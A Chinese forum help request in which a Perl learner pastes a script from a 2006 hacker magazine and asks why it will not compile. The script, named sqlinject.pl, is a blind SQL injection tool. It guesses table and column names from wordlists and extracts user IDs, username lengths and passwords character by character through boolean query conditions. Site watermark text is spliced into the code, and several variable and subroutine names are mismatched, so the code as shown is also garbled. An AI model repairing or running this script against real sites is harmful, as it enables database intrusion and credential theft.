程序调试问题
正在学习perl,在网上看到这篇文章里面的代码,就试试编译下,可一直出问题,编译不下去,那位老大看看能否编译下去,这篇文章发表在黑客防线2006-4-14上面。
http://www.sudu.cn/info/html/edu ... 0050117/177821.html
if($url=~/(\/\/)?(.+?)\/(.+)/)
{
$host=$2;
$path='/'.$3;
if($host=~/(.+):(.+)/)
{
$host=$1;
$port=$2;
}
}
sub connect
{
$req = "GET $path$path1 HTTP/1.0\n". DL.bitsCN.com网管软件下载
"Host: $host\n".
"Referer: $host\n".
"Cookie: \n\n";
到这里就调不下去了,editplus调试显示:
---------- perl ----------
Unrecognized character \xA1 at D:\perlcode\sqlinject.pl line 15.
Output completed (0 sec consumed)
我改了下还是不行:
$req = "GET ".$path.$path1." HTTP/1.0\n".
"Host:".$host."\n".
"Referer:".$host."\n".
"Cookie: \n\n";
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}
open (tabInput,"table.txt") or die "can't open file!\n"; www_bitscn_com
while (chomp(my $input=<tabInput>))
{
my $sql="0<>(select%20count(*)%20from%20$input)";
$path1 = "%20AND%20$sql";
&url;
@res = &connect;
if ("@res"=~/$info/)
{
$table_user=$input;
print "the table of userinfo is:$table\n";
last;
}
}
close(tabInput);
sub field_input
{
my $field;
open (fieInput,"$_[0]") or die "can't open file!\n";
while (chomp(my $input=<fieInput>))
{
my $sql="exists%20(select%20$input%20from%20$table_User)";
$path1 = "%20AND%20$sql";
my @res = &connect;
if ("@res"=~/$info/)
{
$field=$input;
print "\t+-- $field --+";
last;
}
}
close(fieInput);
return $field;
}
$thread1 = threads->create("field_Input","field_Username.txt");
$thread2 = threads->create("field_Input","field_Password.txt");
$thread3 = threads->create("field_Input","field_ID.txt");
$field_Username = $thread1->join();
$field_Password = $thread2->join();
$field_ID = $thread3->join();
@dic1=(128,64,32,16,8,4,2,1); # 最小用户ID
@dic2=(16,8,4,2,1); # 用户名、密码长度
@dic3=(64,32,16,8,4,2,1); # 英文字符
@dic4=(16384,8192,4096,2048,1024,512,256,128,64,32,16,8,4,2,1); #中文字符
sub crack
{
my(@dic) = @_;
my $sql=pop(@dic);
my $i=0;
my $op=1;
my $crack;
foreach my $pass(@dic)
{
print ">";
$i++;
$crack+=$op*$pass;
$path1 = "%20AND%20$crack<($sql)";
my @res = &connect;
if ("@res" =~ /$info/)
{
$op=1;
if($i==@dic)
{
$crack++;
}
}
else
{
$op=-1;
}
}
return $crack;
}
$sql="select%20min($field_ID)%20from%20$table_User";
$id=&crack(@dic1,"$sql");
$sql="select%20len($field_Username)%20from%20$table_User%20where%20field_ID=$id";
my $thread4 = threads->create("crack",@dic2,$sql);
$sql="select%20len($field_Password)%20from%20$table_User%20where%20$field_ID=$id";
my $thread5 = threads->create("crack",@dic2,$sql);
$userlen = $thread4->join();
$passlen = $thread5->join();
sub asc
{
my $asc=$_[0];
my $str;
if ($asc<256)
{
$str = pack('C*',$asc);
}
else
{
$asc*=-1;
$str = sprintf("%X",$asc);
if ($str=~/(.)$/i)
{
$str=$1;
}
$str = pack("H*",$str);
}
return $str;
}
for (my $locat=1;$locat<=$passlen;$locat++)
{
$sql = "select%20asc(mid($field_Password,$locat,1))%20from%20$table_User%20where%20$field_Id=$id"; 中国_网管联盟
$path1 = "%20AND%200>($sql)";
my @res = &connect;
if ("@res" =~ /$info/)
{
$sql = "select%20abs(asc(mid($field_Password,$locat,1)))%20from%20$table_User%20where%20$field_Id=$id";
$password[$locat] = threads->create("crack",@dic4,$sql);
}
else
{
$password[$locat] = threads->create("crack",@dic3,$sql);
}
}
for (my $locat=1;$locat<=$passlen;$locat++)
{
$password[$locat] = $password[$locat]->join();
}
